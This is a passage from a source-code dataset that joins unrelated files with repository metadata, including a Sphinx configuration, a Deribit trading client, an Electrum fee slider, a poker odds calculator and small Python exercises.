pp = (p + idx) % P
tmp = dp(cfg, pp)
if p: tmp += 1
if res is None or res > tmp: res = tmp
cfg[idx] += 1
cache[key] = res
return res
res = len(gs) - dp(cnts, 0)
print "Case #%d: %d" % (1+tmp_tc, res)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
f5a3b71c6bff9673ba71eeecf036dd3089d9ae7c | 9eb09e374d6f1fea46844b8325e30f875b0813f3 | /conf.py | 9196537ce6bce033ae0fda957584b428d5b46b2a | [] | no_license | TuuuNya/sphinx_demo | ef6fdb896703f697b71904a8ec4ec0bf5ec9dc45 | 42808595f0581de552045ea3d97926b773c7bad1 | refs/heads/master | 2020-04-25T21:02:04.036206 | 2019-02-28T08:42:09 | 2019-02-28T08:42:09 | 173,068,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,284 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'WebPocket'
copyright = '2019, TuuuNya'
author = 'TuuuNya'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = 'https://github.com/TuuuNya/sphinx_demo'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WebPocketdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WebPocket.tex', 'WebPocket Documentation',
'TuuuNya', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'webpocket', 'WebPocket Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WebPocket', 'WebPocket Documentation',
author, 'WebPocket', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
| [
"song@secbox.cn"
] | song@secbox.cn |
73be991d92aa7d1f221c705467c3b65a83ab1b85 | c8faa6a4343a1b3775eb0cd707271f6c4aede6be | /quant/platform/deribit.py | 3d076c1c19b2afd753315af68b2af69209a0dfa9 | [
"MIT"
] | permissive | 51bitquant/thenextquant | adada6c2b88723971413f12df23505bd250c86d0 | b0b9d60439a916bc4b1980f908f648aa863d5918 | refs/heads/master | 2023-05-29T21:23:18.198952 | 2023-05-14T08:42:56 | 2023-05-14T08:42:56 | 640,403,755 | 6 | 2 | null | 2023-05-14T01:06:46 | 2023-05-14T01:06:45 | null | UTF-8 | Python | false | false | 13,662 | py | # -*- coding:utf-8 -*-
"""
Deribit Trade module 交易模块
https://docs.deribit.com/v2/
Author: HuangTao
Date: 2019/04/20
"""
import json
import copy
import asyncio
from quant.utils import logger
from quant.const import DERIBIT
from quant.position import Position
from quant.utils.websocket import Websocket
from quant.tasks import LoopRunTask, SingleTask
from quant.utils.decorator import async_method_locker
from quant.order import Order
from quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL
from quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET
from quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \
ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED
from quant.order import TRADE_TYPE_BUY_OPEN, TRADE_TYPE_SELL_OPEN, TRADE_TYPE_SELL_CLOSE, TRADE_TYPE_BUY_CLOSE
class DeribitTrade(Websocket):
""" Deribit Trade module 交易模块
"""
def __init__(self, account, strategy, symbol, host=None, wss=None, access_key=None, secret_key=None,
order_update_callback=None, position_update_callback=None):
""" 初始化
@param account 账户
@param strategy 策略名称
@param symbol 交易对(合约名称)
@param host HTTP请求主机地址
@param wss websocket连接地址
@param access_key ACCESS KEY
@param secret_key SECRET KEY
@param order_update_callback 订单更新回调
@param position_update_callback 持仓更新回调
"""
self._account = account
self._strategy = strategy
self._platform = DERIBIT
self._symbol = symbol
self._host = host if host else "https://www.deribit.com"
self._wss = wss if wss else "wss://deribit.com/ws/api/v2"
self._access_key = access_key
self._secret_key = secret_key
self._order_update_callback = order_update_callback
self._position_update_callback = position_update_callback
self._order_channel = "user.orders.{symbol}.raw".format(symbol=symbol) # 订单订阅频道
super(DeribitTrade, self).__init__(self._wss, send_hb_interval=5)
self._orders = {} # 订单
self._position = Position(self._platform, self._account, strategy, symbol) # 仓位
self._query_id = 0 # 消息序号id,用来唯一标识请求消息
self._queries = {} # 未完成的post请求 {"request_id": future}
self.initialize()
# 注册定时任务
LoopRunTask.register(self._do_auth, 60 * 60) # 每隔1小时重新授权
LoopRunTask.register(self._check_position_update, 1) # 获取持仓
self._ok = False # 是否建立授权成功的websocket连接
@property
def position(self):
return copy.copy(self._position)
@property
def orders(self):
return copy.copy(self._orders)
async def connected_callback(self):
""" 建立连接之后,授权登陆,然后订阅order和position
"""
# 授权
success, error = await self._do_auth()
if error:
return
if success.get("access_token"):
self._ok = True
else:
return
# 获取未完全成交的订单
success, error = await self.get_open_orders()
if error:
return
for order_info in success:
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, order)
# 获取持仓
await self._check_position_update()
# 授权成功之后,订阅数据
method = "private/subscribe"
params = {
"channels": [
self._order_channel
]
}
await self._send_message(method, params)
async def _do_auth(self, *args, **kwargs):
""" 鉴权
"""
method = "public/auth"
params = {
"grant_type": "client_credentials",
"client_id": self._access_key,
"client_secret": self._secret_key
}
success, error = await self._send_message(method, params)
return success, error
async def get_server_time(self):
""" 获取服务器时间
"""
method = "public/get_time"
params = {}
success, error = await self._send_message(method, params)
return success, error
async def get_position(self):
""" 获取当前持仓
"""
method = "private/get_position"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def create_order(self, action, price, quantity, order_type=ORDER_TYPE_LIMIT):
""" 创建订单
@param action 委托方向 BUY SELL
@param price 委托价格
@param quantity 委托数量
@param order_type 委托类型 limit/market
"""
if int(quantity) > 0:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_OPEN
else:
trade_type = TRADE_TYPE_SELL_CLOSE
else:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_CLOSE
else:
trade_type = TRADE_TYPE_SELL_OPEN
quantity = abs(int(quantity))
if action == ORDER_ACTION_BUY:
method = "private/buy"
elif action == ORDER_ACTION_SELL:
method = "private/sell"
else:
logger.error("action error! action:", action, caller=self)
return None
if order_type == ORDER_TYPE_LIMIT:
type_ = "limit"
else:
type_ = "market"
params = {
"instrument_name": self._symbol,
"price": price,
"amount": quantity,
"type": type_,
"label": str(trade_type)
}
success, error = await self._send_message(method, params)
if error:
return None, error
order_no = success["order"]["order_id"]
return order_no, None
async def revoke_order(self, *order_nos):
""" 撤销订单
@param order_nos 订单号,如果没有指定订单号,那么撤销所有订单
* NOTE: 单次调换最多只能撤销100个订单,如果订单超过100个,请多次调用
"""
# 如果传入order_nos为空,即撤销全部委托单
if len(order_nos) == 0:
method = "private/cancel_all_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return False, error
else:
return True, None
# 如果传入order_nos为一个委托单号,那么只撤销一个委托单
if len(order_nos) == 1:
method = "private/cancel"
params = {"order_id": order_nos[0]}
success, error = await self._send_message(method, params)
if error:
return order_nos[0], error
else:
return order_nos[0], None
# 如果传入order_nos数量大于1,那么就批量撤销传入的委托单
if len(order_nos) > 1:
success, error = [], []
method = "private/cancel"
for order_no in order_nos:
params = {"order_id": order_no}
r, e = await self._send_message(method, params)
if e:
error.append((order_no, e))
else:
success.append(order_no)
return success, error
async def get_order_status(self, order_no):
""" 获取订单状态
@param order_no 订单号
"""
method = "private/get_order_state"
params = {"order_id": order_no}
success, error = await self._send_message(method, params)
return success, error
async def get_open_orders(self):
""" 获取未完全成交订单
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def get_open_order_nos(self):
""" 获取未完全成交订单号列表
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return None, error
else:
order_nos = []
for item in success:
order_nos.append(item["order_id"])
return order_nos, None
async def _send_message(self, method, params):
""" 发送消息
"""
f = asyncio.futures.Future()
request_id = await self._generate_query_id()
self._queries[request_id] = f
data = {
"jsonrpc": "2.0",
"id": request_id,
"method": method,
"params": params
}
await self.ws.send_json(data)
logger.debug("send message:", data, caller=self)
success, error = await f
if error:
logger.error("data:", data, "error:", error, caller=self)
return success, error
@async_method_locker("generate_query_id.locker")
async def _generate_query_id(self):
""" 生成query id,加锁,确保每个请求id唯一
"""
self._query_id += 1
return self._query_id
@async_method_locker("process.locker")
async def process(self, msg):
""" 处理websocket消息
"""
logger.debug("msg:", json.dumps(msg), caller=self)
# 请求消息
request_id = msg.get("id")
if request_id:
f = self._queries.pop(request_id)
if f.done():
return
success = msg.get("result")
error = msg.get("error")
f.set_result((success, error))
# 推送订阅消息
if msg.get("method") == "subscription":
if msg["params"]["channel"] == self._order_channel:
order_info = msg["params"]["data"]
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, copy.copy(order))
async def _check_position_update(self, *args, **kwargs):
""" 定时获取持仓
"""
if not self._ok:
return
update = False
success, error = await self.get_position()
if error:
return
if not self._position.utime: # 如果持仓还没有被初始化,那么初始化之后推送一次
update = True
self._position.update()
size = int(success["size"])
average_price = float(success["average_price"])
liquid_price = float(success["estimated_liquidation_price"])
if size > 0:
if self._position.long_quantity != size:
update = True
self._position.update(0, 0, size, average_price, liquid_price)
elif size < 0:
if self._position.short_quantity != abs(size):
update = True
self._position.update(abs(size), average_price, 0, 0, liquid_price)
elif size == 0:
if self._position.long_quantity != 0 or self._position.short_quantity != 0:
update = True
self._position.update()
if update:
await self._position_update_callback(self._position)
def _update_order(self, order_info):
""" 更新订单信息
@param order_info 订单信息
"""
order_no = order_info["order_id"]
quantity = int(order_info["amount"])
filled_amount = int(order_info["filled_amount"])
remain = quantity - filled_amount
average_price = order_info.get("average_price")
state = order_info["order_state"]
if state == "open":
status = ORDER_STATUS_SUBMITTED
if filled_amount > 0:
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
elif state == "cancelled":
status = ORDER_STATUS_CANCELED
else:
status = ORDER_STATUS_FAILED
order = self._orders.get(order_no)
if not order:
action = ORDER_ACTION_BUY if order_info["direction"] == "buy" else ORDER_ACTION_SELL
trade_type = int(order_info.get("label"))
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"symbol": self._symbol,
"order_no": order_no,
"action": action,
"price": order_info["price"],
"quantity": quantity,
"remain": remain,
"trade_type": trade_type
}
order = Order(**info)
self._orders[order_no] = order
order.status = status
order.remain = remain
order.avg_price = average_price
order.ctime = order_info["creation_timestamp"]
order.utime = order_info["last_update_timestamp"]
if order.status in [ORDER_STATUS_FILLED, ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED]:
self._orders.pop(order.order_no)
return order
| [
"huangtao@ifclover.com"
] | huangtao@ifclover.com |
bee3b42d7296eade936964032ad2370f89b807d1 | cb3b8fda8f03642e50fa5bc84438a594128930a2 | /src/lgpl/SConscript | 2bb90c23349d315937aee4e34fee58e8ba3b6e4c | [
"ISC"
] | permissive | OuluLinux/pedigree | fbb83055d0afd1e620f48d8cfd89a2bf88235701 | 4f02647d8237cc19cff3c20584c0fdd27b14a7d4 | refs/heads/master | 2022-12-28T15:49:01.918113 | 2013-05-25T02:20:01 | 2013-05-25T02:20:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | ####################################
# SCons build system for Pedigree
## Tyler Kennedy (AKA Linuxhq AKA TkTech)
####################################
import os
import shutil
Import(['env'])
# To include a new subdirectory just add to the list.
subdirs = ['SDL-1.2.14']
SConscript([os.path.join(i, 'SConscript') for i in subdirs],exports = ['env'])
| [
"matthew@theiselins.net"
] | matthew@theiselins.net | |
b945efe586fc69a6bd39e654fb0ea895ace5cc29 | fc79f39e32bcb97e2c47ab7fb820098e388cd55c | /Listas.py | 781e3d0da36bf9ab433957a5fe4124ef70b915ae | [] | no_license | EdwardAlvarado/Clase1 | 859f84ca4bc4e9b4ef4f190e6d792a2a85d94ffa | 1f167cd3afbaa5fce21af79d0c7053837307036e | refs/heads/master | 2020-06-18T00:50:01.685152 | 2019-07-16T02:52:10 | 2019-07-16T02:52:10 | 196,114,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | valores = range(100)
print valores
m = 0
for i in valores:
m=i**2
print m
| [
"noreply@github.com"
] | EdwardAlvarado.noreply@github.com |
b2fc4e3cfd43f94cd2d66299af2e1b8145681be7 | fea4402f50b7a340db6122bf900243ada95018d4 | /src/password_manager/panel.py | 95422dcff8e5867e452ed91b6ffda710644ee538 | [] | no_license | CloudPadovana/openstack-security-integrations | ae516c5e7b15cee50fd01da3d69f66bfb26dde10 | fc22a9930aecc466d7b29af4095fbe922962077a | refs/heads/master | 2023-08-08T09:51:30.659062 | 2023-07-28T10:00:28 | 2023-07-28T10:00:28 | 14,750,978 | 0 | 2 | null | 2017-11-17T14:29:47 | 2013-11-27T15:31:37 | Python | UTF-8 | Python | false | false | 936 | py | # Copyright (c) 2014 INFN - "Istituto Nazionale di Fisica Nucleare" - Italy
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import gettext_lazy as _
import horizon
from openstack_dashboard.dashboards.settings import dashboard
class PasswordPanel(horizon.Panel):
name = _("Manage Password")
slug = 'password_manager'
dashboard.Settings.register(PasswordPanel)
| [
"paolo.andreetto@pd.infn.it"
] | paolo.andreetto@pd.infn.it |
b068a3f92381280a3c6a6e752cc92bdfb5747bba | 1542ec5349d8be375cb7b2aa0b9b894982831448 | /gui/qt/fee_slider.py | dffff5c4bc727cf8b1e8b003a8cf7f1a86740365 | [
"MIT"
] | permissive | NeblioTeam/electrum-nebl | 31edf95e30e914d7e04c0298842b33a6408fc4e5 | a22a5dbeec15b93e24aefd974e5bb896a1d96a5f | refs/heads/master | 2022-11-14T13:57:25.623247 | 2020-07-15T15:11:13 | 2020-07-15T15:11:13 | 110,052,588 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,018 | py | from electrum_nebl.i18n import _
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import threading
class FeeSlider(QSlider):
def __init__(self, window, config, callback):
QSlider.__init__(self, Qt.Horizontal)
self.config = config
self.window = window
self.callback = callback
self.dyn = False
self.lock = threading.RLock()
self.update()
self.valueChanged.connect(self.moved)
def moved(self, pos):
with self.lock:
fee_rate = self.config.dynfee(pos) if self.dyn else pos * self.fee_step
tooltip = self.get_tooltip(pos, fee_rate)
QToolTip.showText(QCursor.pos(), tooltip, self)
self.setToolTip(tooltip)
self.callback(self.dyn, pos, fee_rate)
def get_tooltip(self, pos, fee_rate):
from electrum_nebl.util import fee_levels
rate_str = self.window.format_amount(fee_rate) + ' ' + self.window.base_unit() + '/kB'
if self.dyn:
tooltip = fee_levels[pos] + '\n' + rate_str
else:
tooltip = 'Fixed rate: ' + rate_str
if self.config.has_fee_estimates():
i = self.config.reverse_dynfee(fee_rate)
tooltip += '\n' + (_('Low fee') if i < 0 else 'Within %d blocks'%i)
return tooltip
def update(self):
with self.lock:
self.dyn = self.config.is_dynfee()
if self.dyn:
pos = self.config.get('fee_level', 2)
fee_rate = self.config.dynfee(pos)
self.setRange(0, 4)
self.setValue(pos)
else:
self.fee_step = self.config.max_fee_rate() / 10
fee_rate = self.config.fee_per_kb()
pos = min(fee_rate / self.fee_step, 10)
self.setRange(1, 10)
self.setValue(pos)
tooltip = self.get_tooltip(pos, fee_rate)
self.setToolTip(tooltip)
| [
"neblioteam@gmail.com"
] | neblioteam@gmail.com |
ed97e8811b6301d5bad032acec68d9d059cf10d8 | 999312fc8102f952d4da618914b0b8b97a899667 | /src/data_utils.py | 002368fbd919bafa236558ac5567328fe5fefbfd | [] | no_license | adregan/APImachine | 60d140bbdd8b39f2b90779277a69bf6c32bd036c | e4d62ed3b9ed24b64d6fdf0599377b20ea384abe | refs/heads/master | 2020-05-29T23:10:53.143361 | 2015-03-24T04:17:19 | 2015-03-24T04:17:19 | 31,473,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | def convert_id(entry):
entry['id'] = str(entry['id'])
return entry
| [
"duncanregan@gmail.com"
] | duncanregan@gmail.com |
d6177edf3e386fe4a31432ae43201ef687f67376 | 938e0e6ea9b5ed59f1cd0243cf2f3f9bed061c32 | /src/main.py | c3537c3ac81967b6af66c7419fdea85ac82d359f | [] | no_license | KristianAsp/WordTreeExercise | 57393eaee3312e472bc92bab8b0ff59e55fb1457 | 5b8bbb5095ab1fb0169f3ca8390af75f0cae4b83 | refs/heads/master | 2020-09-30T06:53:31.118112 | 2019-12-11T22:26:28 | 2019-12-11T22:26:28 | 227,233,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | from src.WordTree import WordTree
t = WordTree()
t.add("car"); t.add("can"); t.add("cat"); t.add("cat"); t.add("cat")
print("1: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst())
print(t, t.size)
# t.remove("")
print(t, t.size)
t.add("")
print(t, t.size)
t.add("ca")
print("2: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst())
print(t, t.size)
# t.remove("car")
# print("3: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst()) print(t, t.size)
# t.remove("cat"); t.remove("cat"); t.remove("cat")
# print("4: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst()) print(t, t.size)
# t.remove("ca"); t.add("car")
# print("5: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst()) print(t, t.size) | [
"kristian.aspevik@gmail.com"
] | kristian.aspevik@gmail.com |
dc0bd4f2663604ec7cd4633cec7f0b91e328e640 | 8ee20b9758f34b1dfcf5a823f5f8f0c7e96e12c4 | /basic.py | f40a52098a5e2e876b36f05f25d1a4b928db41b4 | [] | no_license | Ashwin-Dhakal/learning-machine-learning | d749850e361408ae2173801167b1ace82a766f42 | 0d7400a3f1710fd5827c8499d7e65aff3296a777 | refs/heads/master | 2021-05-05T11:32:43.685193 | 2018-02-10T11:46:43 | 2018-02-10T11:46:43 | 118,204,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | import pandas as pd
import quandl
df= quandl.get('WIKI/GOOGL')
df= df[['Adj. Open','Adj. Close','Adj. Low','Adj. High', 'Adj. Volume']]
df['HL_PCT']= (df['Adj. High'] - df['Adj. Close'])/df['Adj. Close']*100
df['percent_change'] = (df['Adj. Close']- df['Adj. Open'])/df['Adj. Open']*100
df= df[['Adj. Close', 'HL_PCT', 'percent_change', 'Adj. Volume', 'Adj. Open']]
print('this is the answer')
print(df.head()) #this prints all the column of the data provided to us
| [
"ashwindhakal97@gmail.com"
] | ashwindhakal97@gmail.com |
e2fbe9dfcab8909ac704f3fd6cc475c17abfa26e | 10b116a0e957089c80ef61efe447e132892742af | /matematicas.py | 745aca1dc5407acedfe87409730abc3150017212 | [] | no_license | apdaza/clase4 | 7b7b6a0fa081086daa8a87afc584432e0b213105 | 6c6340981f24d093dc1e3341cff3a562939ec5cd | refs/heads/master | 2020-05-18T10:38:17.917338 | 2019-05-01T02:09:03 | 2019-05-01T02:09:03 | 184,357,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | def suma(a, b):
return a + b
def resta(a, b):
return a - b
def producto(a, b):
return a * b
def division(a, b):
return a / b
def factorial(n):
acum = 1
for i in range(1,n+1):
acum *= i
return acum
def factorial2(n):
if n == 0:
return 1
return n * factorial2(n-1)
def fibo(n):
if n in (1,2):
return 1
return fibo(n-1)+fibo(n-2)
def contar_sub(lista):
if lista == []:
return 0
return len(lista[0]) + contar_sub(lista[1:])
def suma_lista(lista):
if lista == []:
return 0
return lista[0] + suma_lista(lista[1:])
def suma_sublistas(lista):
if lista == []:
return 0
return suma_lista(lista[0]) + suma_sublistas(lista[1:])
| [
"noreply@github.com"
] | apdaza.noreply@github.com |
742b3474b402ecfb9f2c483f25434098751f9c93 | 43b13c066530348bd0eecaa4efd68f148ec8467a | /learnpython/projects/ex48/tests/lexicon_tests.py | fdb3d55cb374da841f38804a31f7784201923f7f | [] | no_license | NoJhonnie/Github | 0d9c4098de60f1bbc40041c8303a18ce5e825b20 | 9768d4aa1393008981d1bd818d4bec54fb25d5d2 | refs/heads/master | 2021-09-06T18:23:07.388778 | 2018-02-09T15:40:56 | 2018-02-09T15:40:56 | 112,492,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | from nose.tools import *
from ex48 import lexicon
def test_directions():
assert_equal(lexicon.scan("north"), [('direction', 'north')])
result = lexicon.scan("north south east")
assert_equal(result, [('direction', 'north'),
('direction', 'south'),
('direction', 'east')])
def test_verbs():
assert_equal(lexicon.scan("go"), [('verb', 'go')])
result = lexicon.scan("go kill eat")
assert_equal(result, [('verb', 'go'),
('verb', 'kill'),
('verb', 'eat')])
def test_stops():
assert_equal(lexicon.scan("the"), [('stop', 'the')])
result = lexicon.scan("the in of")
assert_equal(result, [('stop', 'the'),
('stop', 'in'),
('stop', 'of')])
def test_nouns():
assert_equal(lexicon.scan("bear"), [('noun', 'bear')])
result = lexicon.scan("bear princess")
assert_equal(result, [('noun', 'bear'),
('noun', 'princess')])
def test_numbers():
assert_equal(lexicon.scan("1234"), [('number', 1234)])
result = lexicon.scan("3 91234")
assert_equal(result, [('number', 3),
('number', 91234)])
def test_errors():
assert_equal(lexicon.scan("ASDFGHJKL"), [('error', 'ASDFGHJKL')])
result = lexicon.scan("bear IAS princess")
assert_equal(result, [('noun', 'bear'),
('error', 'IAS'),
('noun', 'princess')]) | [
"smgjc123@163.com"
] | smgjc123@163.com |
383fd6ad815752f90385310887146c923428992e | 15c3fd316a6ba0fd0581e1ca3fc0bc526ee15957 | /holdem_calc.py | 1dd8b0e3acdf8ab9e712ab136f9adf182fe2b315 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | shakedzy/holdem_calc | 758ea845732ebb98df486617ea5bcf991771ae9a | 7e1b360fcd194734c49238dc873c70ee9e1672c3 | refs/heads/master | 2020-03-26T21:31:47.460144 | 2019-04-26T22:37:12 | 2019-04-26T22:37:12 | 145,393,300 | 0 | 1 | MIT | 2018-08-20T09:05:12 | 2018-08-20T09:05:12 | null | UTF-8 | Python | false | false | 3,570 | py | import time
import holdem_functions
import holdem_argparser
def main():
hole_cards, num, exact, board, file_name = holdem_argparser.parse_args()
run(hole_cards, num, exact, board, file_name, True)
def calculate(board, exact, num, input_file, hole_cards, verbose):
args = holdem_argparser.LibArgs(board, exact, num, input_file, hole_cards)
hole_cards, n, e, board, filename = holdem_argparser.parse_lib_args(args)
return run(hole_cards, n, e, board, filename, verbose)
def run(hole_cards, num, exact, board, file_name, verbose):
if file_name:
input_file = open(file_name, 'r')
for line in input_file:
if line is not None and len(line.strip()) == 0:
continue
hole_cards, board = holdem_argparser.parse_file_args(line)
deck = holdem_functions.generate_deck(hole_cards, board)
run_simulation(hole_cards, num, exact, board, deck, verbose)
print "-----------------------------------"
input_file.close()
else:
deck = holdem_functions.generate_deck(hole_cards, board)
return run_simulation(hole_cards, num, exact, board, deck, verbose)
def run_simulation(hole_cards, num, exact, given_board, deck, verbose):
num_players = len(hole_cards)
# Create results data structures which track results of comparisons
# 1) result_histograms: a list for each player that shows the number of
# times each type of poker hand (e.g. flush, straight) was gotten
# 2) winner_list: number of times each player wins the given round
# 3) result_list: list of the best possible poker hand for each pair of
# hole cards for a given board
result_histograms, winner_list = [], [0] * (num_players + 1)
for _ in xrange(num_players):
result_histograms.append([0] * len(holdem_functions.hand_rankings))
# Choose whether we're running a Monte Carlo or exhaustive simulation
board_length = 0 if given_board is None else len(given_board)
# When a board is given, exact calculation is much faster than Monte Carlo
# simulation, so default to exact if a board is given
if exact or given_board is not None:
generate_boards = holdem_functions.generate_exhaustive_boards
else:
generate_boards = holdem_functions.generate_random_boards
if (None, None) in hole_cards:
hole_cards_list = list(hole_cards)
unknown_index = hole_cards.index((None, None))
for filler_hole_cards in holdem_functions.generate_hole_cards(deck):
hole_cards_list[unknown_index] = filler_hole_cards
deck_list = list(deck)
deck_list.remove(filler_hole_cards[0])
deck_list.remove(filler_hole_cards[1])
holdem_functions.find_winner(generate_boards, tuple(deck_list),
tuple(hole_cards_list), num,
board_length, given_board, winner_list,
result_histograms)
else:
holdem_functions.find_winner(generate_boards, deck, hole_cards, num,
board_length, given_board, winner_list,
result_histograms)
if verbose:
holdem_functions.print_results(hole_cards, winner_list,
result_histograms)
return holdem_functions.find_winning_percentage(winner_list)
if __name__ == '__main__':
start = time.time()
main()
print "\nTime elapsed(seconds): ", time.time() - start
| [
"kevin.tseng@gmail.com"
] | kevin.tseng@gmail.com |
0564ea410472f263a69ec01666ed0456ace1bef1 | 542d8c7b2c8e8f08cad1e0fa44420aa063e3eece | /Array_Rotation.py | ad23e6f9f149ffd66311c3b564de1a292c4fa642 | [] | no_license | bharatigupta2405/Python_Hacker_Rank | 28b63fff5c565df69dc87d2332864ff7f52cd4f3 | 0c336dc2e6a4de2e71181479f3d9523250b399da | refs/heads/master | 2023-01-14T07:55:20.357746 | 2020-10-26T12:28:32 | 2020-10-26T12:28:32 | 290,551,522 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the circularArrayRotation function below.
def circularArrayRotation(a, k, queries):
for i in range(k):
p=a.pop()
a.insert(0,p)
l=[]
for j in range(len(queries)):
l.append(a[queries[j]])
return l
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nkq = input().split()
n = int(nkq[0])
k = int(nkq[1])
q = int(nkq[2])
a = list(map(int, input().rstrip().split()))
queries = []
for _ in range(q):
queries_item = int(input())
queries.append(queries_item)
result = circularArrayRotation(a, k, queries)
fptr.write('\n'.join(map(str, result)))
fptr.write('\n')
fptr.close()
| [
"bharatigupta2405@gmail.com"
] | bharatigupta2405@gmail.com |
